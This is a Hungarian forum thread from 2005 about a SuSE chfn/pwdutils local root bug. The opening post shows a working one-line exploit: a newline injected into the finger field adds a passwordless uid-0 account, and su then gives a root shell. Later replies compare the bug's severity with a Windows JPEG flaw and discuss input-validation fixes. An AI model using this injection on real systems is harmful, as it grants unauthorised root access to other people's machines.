SuSE: pwdutils, shadow / local privilege escalation

Miután rájöttem, hogy hogyan kell kihasználni ezt a bugot (fél percig se tartott), könnyesre röhögtem magam.

Mivel máshol még nem láttam publikálva az "exploitot", ezért gondoltam elsőként megosztom a hup közöséggel... ;D

hunger@suse:~> id

uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)

hunger@suse:~> chfn -h "`echo -e ':/:/bin/sh
r00t::0:0:'`" hunger

Changing finger information for hunger.

Password:

Finger information changed

hunger@suse:~> su r00t

sh-2.05b# id

uid=0(r00t) gid=0(root) groups=0(root)

Azért elég szégyen ez 2005-ben egy vezető Linux disztribúcióban... :P

bah, phpnuke kikapta a /bin/sh és a r00t közül a backslash-n-t (new line).

te kecseg ;DDDD

Még jó, hogy itthon egyedül használom a Linuxom ezért, csak én lehetnék a "rosszindulatú lokális felhasználó" aki root jogokat szerez a saját gépén.

Mentségemre szolgál, hogy még a SuSE 7.1-en alapuló rendszer használom :-D

Azt meg nem érinti tudtommal.

Script kiddie védelem, így már 10-ből 9 nem tudja kihasználni a hibát... ;))

honnan veszed? A SuSE a 8.2-t sem támogatja már (talán tavasz óta?), ezért nem is szerepelhetett a hírben. Az meg ugyebár újabb, mint a 7.1.

Nagyapa :) Tudod, attól hogy csak te ülsz a géped előtt, azért még távolról ki tudnak használni a gépeden interneten keresztül (pl.) egy Firefox bugot, amelynek köszönhetően lokális felhasználói hozzáférést szereznek. Onnan meg mint látod, már csak egy ugrás a sugár. ;D

Btw. 7.1-ben lehet, hogy _ez_ a hiba nincs benne, viszont vannak benne jóval durvább kernel bugok, amelyekre már jóideje publikusan elérhetőek az exploitok és akkor még csak bugos suidos binárisra sincs szükség... ;P

Olyan ez, mint ha még mindig a régi DOS-os Pasteur nevű viruskeresőt használnád arra hivatkozva, hogy az már bevált, hisz annak idején megtalálta a One half vírust is. ;)

Én meg tavaly a windowsos jpeg-exploiton röhögtem könnyesre magam, amelyet kihasználva egyetlen jpg fájlt megnézetve a userrel, lett egy admin jogú felhasználó a gépen. 2004-ben ez világ legelterjedtebb OS-étől elég szégyen volt :P

Minőségbeli különbségek vannak a hibák között...

Ha jól emlékszem a Windows JPEG exploit egy GDI+ heap memory overflow bugon alapult, amelynek a kihasználása messze nehezebb, mint ennek a suse/chfn bugnak... Elég ha csak arra gondolsz, hogy ehez még külön exploit program sem kell, elég ha bepötyögöd a shellbe. ;P

Vagy szerinted egy súlycsoport a két bug?

Amennyiben képes vagy ilyen [www.frsirt.com] exploitok írására, szerintem most jelezd, mert rengeteg cég ajánlana egyből munkát neked. ;)

In article <42.56189@c.hup.hu>, hunger wrote:
> Olyan ez, mint ha még mindig a régi DOS-os Pasteur nev? viruskeres?t
> használnád arra hivatkozva, hogy az már bevált, hisz annak idején
> megtalálta a One half vírust is. ;)

Ja, de ha jol emlexek nem irtotta ;) Vagy mittomenmelyiknem ;)

--
Gabucino

jah, bezzeg a Slovak Antivirus Center programja meg ki is titkositott a particiot! ;P

Anyám, Pasteur... de rég is volt az :)

Uff.

Ilyen kaliberu hibakat kb. 1994-95-ben lattam utoljara a "Bevezetes a UNIX oprendszerbe" oran, a hallgatok altal bash-ban megirt cgi scriptekben :)

Jol sejtem, hogy egy ehhez hasonlo rendkivul bonyolult megoldassal orvosolhato lenne/lett volna a problema?

"The only restriction placed on the contents of the fields is that no control characters may be present, nor any of comma, colon, or equal sign."

Vagy erre is van valakinek instant otlete, hogy hogy lehet megkerulni... Ez egyebkent man chfn egy Ubuntun.

Debianban megneztem a forrast, ott van egy kb. 10 soros valid_field fuggveny, amit szerintem amig a strchr fuggveny nem bugos, addig nehez lesz atverni. Azt meg szinten eleg nehez bugosra megirni... :)

Jah, bár így utólag belegondolva, a One half helyett a Cascade vírus lehet jobb példa lett volna... ;DD

Nah! Nekem is teljesen hasonló dolog jutott először eszembe, amikor megláttam ezt a hibát... :)

A mező hosszára sem árt korlátot beállítani, praktikusan kisebbet, mint a libc-beli korlát a getpwent() típusú fv-ekben (már ha van ilyen korlát, de csodálkoznék ha nem lenne).

hát. ott fogtál egy jpg-t és ha vki megnézte, volt admin acc a gépére.

ehhez meg kell shell. melyik van gyakrabban?

úgyhogy szerintem tényleg nem voltak egy súlycsoportban, a windowsos súlyosabb volt.

egyébként egyáltalán nem vagyok képes olyan exploitok irására, csak ez a hűha égés duma nem jött be annyira :-P peace ;)

Régi szép emlékek. =))) Dejó is volt. =D

Az egyik egy viszonylag bonyolult kernel programozási hiba, amelynek a kihasználásához rendkívűl nagy szakértelem kell és ismerni kell a windows belső felépítésétől kezdve a processzor működésén át sokminden más dolgot, míg a másik bug egy sima program, amely elégtelenül ellenőrzi az egyik megadott paramétert.

Lehet, hogy távolról nézve a Windowsos hiba súlyosabbnak néz ki, de rátalálni és exploitot írni rá is nagyságrendekkel nehezebb.

amig a strchr fuggveny nem bugos, addig nehez lesz atverni. Azt meg szinten eleg nehez bugosra megirni... :)

ne becsüld alá a programozók "kreativítását"... ;D

Igen, nyilván a karakter készlet szűrésének a hiánya a fő probléma, hiszen már kettőspontot sem szabadna engednie bevinni, nem hogy 'új sor' karaktert... Az hogy egy ilyen ellenőrzést meg lehet-e kerülni nyilván többek közt a megvalósítástól is függ (ahogy írta miq). A programok egyre jobban összetettebbek és az emberek is úgy tűnik egyre furfangosabbak. :) Lehet, hogy az ellenőrző/szűrő algoritmus látszólag jónak tűnik, de mi van, ha az alacsonyabb szinten lévő függvény könyvtárakban van valahol kihasználható hiba? Akár a fordítóban is lehet bug...

Szerintem örök érvényű kijelentés:

No Security in this Crazy World! ;-)